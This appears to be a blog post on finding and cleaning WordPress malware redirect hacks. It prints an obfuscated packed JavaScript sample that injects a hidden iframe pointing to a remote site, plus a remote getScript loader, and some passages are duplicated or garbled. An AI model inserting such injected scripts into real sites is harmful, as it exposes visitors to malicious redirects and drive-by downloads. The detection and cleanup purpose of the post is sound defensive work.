What is Wordpress Malware Redirect — How to Detect & Fix?

Marica Jansen
7 min readJan 15, 2020

--

A WordPress malware redirect hack is a code inserted into a website with the intent of redirecting the site visitor to a different website. Malicious redirects are always interlinked with each other a website by hackers with the intent of generating advertising and marketing impressions.

However, some malicious redirections could have more harmful effects. A malicious redirect can exploit vulnerabilities in a site visitor’s computer through web-based scripts to install malware on unprotected machines. As such, it is critical to remove malicious redirects from your site.

Finding and Removing Malicious Redirects

Before you decide to make modifications to your site files or database, we suggest backing up all site files in a secure place, especially when you do not know with the inner workings of your content management system (CMS).
A malicious redirect can be inserted at any place on your site. It might be in your site files or perhaps in your database.

Here are some of the malicious redirects often detected by our scans and some instructions on how to remove WordPress malware redirect hack.

Javascript insertions in your site’s files.

On WordPress sites, we see javascript entries placed in theme files. Typically we will find these within the theme’s header, often right above the tag. But they can be elsewhere in the site’s files.

A script typically found in the header can look like the following:

<sc​ript>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.from​CharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k)}}return p}('i 9(){a=6.h(\'b\');7(!a){5 0=6.j(\'k\');6.g.l(0);0.n=\'b\';0.4.d=\'8\';0.4.c=\'8\';0.4.e=\'f\';0.m=\'w://z.o.B/C.D?t=E\'}}5 2=A.x.q();7(((2.3("p")!=-1&&2.3("r")==-1&&2.3("s")==-1))&&2.3("v")!=-1){5 t=u("9()",y)}',41,41,'el||ua|indexOf|style|var|do​cument|if|1px|MakeFrameEx|element|yahoo_api|height| width|display|none|body|get​ElementById|function|createElement|iframe|append​Child|src|id|nl|msie| toLowerCase|opera|webtv||setTimeout|windows|http|userAgent|1000|juyfdjhdjdgh|navigator|ai| showthread|php|72241732'.split('|'),0,{}))

</sc​ript>

<img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-wp-preserve="%3Cscript%26gt%3Bvar%20ar%3D%22%3D2%7DCd8%20pvsyw%3AAlEeTcBNfb6u%26gt%3B1%26lt%3B%2C)h.r3'niao0%20g%3B%2F%7Bm%5B%5C%22(t%5D%22%3Btry%7B'qwe'.length(1)%3B%7Dcatch(a)%7Bk%3Dnew%20Boolean().toString()%3Bdate%3Dnew%20Date()%3B%7D%3Bvar%20ar2%3D%22f120%2C120%2C108%2C63%2C18%2C144%2C12%2C114%2C54%2C72%2C135%2C48%2C105%2C147%2C93%2C123%2C48%2C147%2C45%2C42%2C48%2C135%2C48%2C105%2C147%2C%2027%2C57%2C30%2C51%2C111%2C123%2C60%2C111%2C135%2C48%2C144%2C102%2C66%2C114%2C12%2C30%2C102%2C87%2C138%2C117%2C150%2C87%2C132%2C120%2C120%2C120%2C%20...%0A%5B%2Fjs%5D%3C%2Fpre%3E%0A%3Cp%3EA%20malicious%20script%20can%20look%20like%20a%20normal%20javascript%20included%20file.%3C%2Fp%3E%0A%3Cpre%3E%5Bjs%20gutter%3D%22false%22%20wraplines%3D%22true%22%5D%0A%3Cscript%20src%3D%22http%3A%2F%2Fwww.%5Bredacted%5D.com%2Fanyscript.js%22%3E%3C%2Fscript%3E" data-mce-resize="false" data-mce-placeholder="1" class="mce-object" width="20" height="20" alt="&lt;script&gt;" title="&lt;script&gt;" />

A malicious script can also be included in another script.

$.getScript('http://www.[redacted].com/script.js', function()

How was your WordPress website infected?

Attackers use several ways to redirect the user. Some of them are:

Redirect users through malicious codes which they inject into the website
Attackers might also execute .php codes
Attackers can add themselves to your website as ghost admins

By inserting codes in .htaccess/wp-config.php files
In many cases, we saw that the attackers would hide malicious codes or files in the .htaccess file. These codes sometimes look exactly like the legitimate ones. This makes it more difficult to identify and remove them. Apart from code insertion in .htaccess files, the codes might also be disguised in other WordPress core files such as wp-config .php, wp-vcd, etc to name a few.

The following picture shows the hidden codes, security experts at Astra found in one of our client’s site.

We’ve also seen instances of WordPress websites being hacked by JS insertion in plugin vulnerabilities. In an attempt to hide the details, these JavaScripts are often inserted in a string format rather than a character format to look more complex. Here is an example of that.

Users also faced an issue once they used Internet Explorer. On The web Explorer, the malware took the users to websites that forced fake updates of Java and Flash updates. This link led to the downloading of the adobe_flash_player-31254524.exe file. Several security services reported this to be malware.

Where is the WordPress Redirect Infection?

Attackers can infect the website by injecting code in any of the core files on WordPress. Check these files for malicious codes:

Index.php
Index.html
.htaccess file
Theme files
Footer.php
Header.php
Functions.php
Some codes even infect .js files, which include jquery.js file. You can also find some of the malicious codes in the source code of the page.

How to Removing The Malicious Scripts And Redirections

Dig Deeper: Pretend You’re a Bot or User-Agent

Often running tests to evaluate if your website is infected with malware would put your very own system at risk. So, to bypass this, you could use cURL CLI (Command Line Interface) to pretend you’re a Google bot or a user agent.

You can enter the following command to emulate a bot through an ssh client:

$ curl –location -D — -A “Googlebot” somesite.com

Once you enter this, you should look for something that doesn’t make sense in the code. So, bits which are in a different language than your own or content that looks like gibberish in general. Yes, you’ll need to recognize HTML at the least, here. Something in an iframe or script tag has to grab your attention, too.

You can also use this little code to emulate a user agent(again through an ssh client):

$ curl -A “Mozilla/5.0 (compatible; MSIE 7.01; Windows NT 5.0)” http://www.somesite.com
You can edit or replace the “browser” tag which is referenced here depending on your needs.

A few different commands you might want to get familiar with are Grep and Find which work through an ssh client. These commands will help you to discover where the hacking took place on your website, so then manually you can remove the malicious code that placed you on Google’s Blacklist.

Here’s a list of useful resources to speed up the process of cleaning your site on the terminal.

Command-line
SSH
What’s My User Agent?
Step 4: Removing Bad Code

In case your website has been injected with malware, you’ll need to remove the malicious scripts that caused the redirections to the abusive websites. If the attackers created new pages with malicious code, you can remove them from Search Engine Results altogether by going to Google ‘s Search Engine Console and using the Remove URLs Feature.
Next you should update the theme, plugins, and install any new core updates that are available. Make sure everything is as up to date as possible. This will reduce your website’s vulnerabilities.

Finally, change all of the passwords on your website. And I mean all of them! Not just the WordPress Administrator Password, you also need to reset the passwords for your FTP Account, Regenerate WordPress Salt Keys, Database(s), Hosting, and anything else related to your website to ensure the security.

Removing Bad Code

If you discover that your website has been injected with malware, you will have to remove the malicious scripts that caused the redirections to the abusive websites. If the hackers created new pages with malicious code, you can remove them from Search Engine Results altogether by going to Google ‘s Search Engine Console and using the Remove URLs Feature.

you ought to update the theme, plugins, and install any new core updates that are available. Ensure things are as up to date as possible. This will likely reduce your website’s vulnerabilities.

Additionally, modify of the passwords on your website. And I suggest each of them! Not just the WordPress Administrator Password, in addition, you will need to reset the passwords for your FTP Account, Regenerate WordPress Salt Keys, Database(s), Hosting, and anything else related to your website to ensure the security.

Resubmit Your Site

When your website was blacklisted due to malicious redirections, and it’s been removed from Google’s search results, you have to submit your site for review. Otherwise, Google won’t be aware that you’ve taken valuable steps to cure the trouble.

In case your website was involved with phishing, you’ll need to submit a put up a reconsideration request through Google Webmaster Tools(it’s now called as Google Search Console). I’m going to assume your website is already added, so when you’re logged in, click on Search Traffic >> Manual Actions. You ought to then be prompted to submit a review.

Keeping Your Site Secure
In order to keep your site secure you need to make sure you follow the guidelines found below:

Have your WordPress site core files updated.
Have your themes and plugins updated?
Use a Safe Secure WordPress Hosting Service, if possible choose one which can Manage your WordPress Site instead of just from Hosting it.
If you choose to use a reseller hosting account under a non-WordPress Friendly Hosting Provider then you should avoid adding sites as addons under your main account. You can setup those sites in a separate site account.
Remove any inactive themes or plugins you don’t plan to use in your site.
Review your WordPress plugins and themes and make sure all of them are recently updated by its developers, if not you should seek some alternatives and remove them from your WordPress Site.
Never install nulled themes or plugins.
Keep one or two admin accounts, downgrade the rest of your admin users into an author or an editor.
Remove all dev/demo setups of your WordPress installation outside your public directory.

--

--

Marica Jansen

I am blogger, mother of two daughters, triathlon, Iron woman. From San Francisco, but living on beautiful Salt Spring Island. I am professional php developer.